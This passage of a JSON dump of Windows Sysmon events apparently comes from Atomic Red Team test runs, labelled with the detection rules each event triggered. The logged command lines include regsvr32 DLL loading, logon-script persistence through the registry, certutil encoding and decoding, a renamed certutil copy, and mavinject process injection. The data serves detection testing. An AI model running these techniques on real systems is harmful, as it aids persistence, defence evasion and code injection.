(WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"}},"Version":5}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"}},"Version":5}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"}},"Version":2}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command 
Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"}},"Version":5}}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 
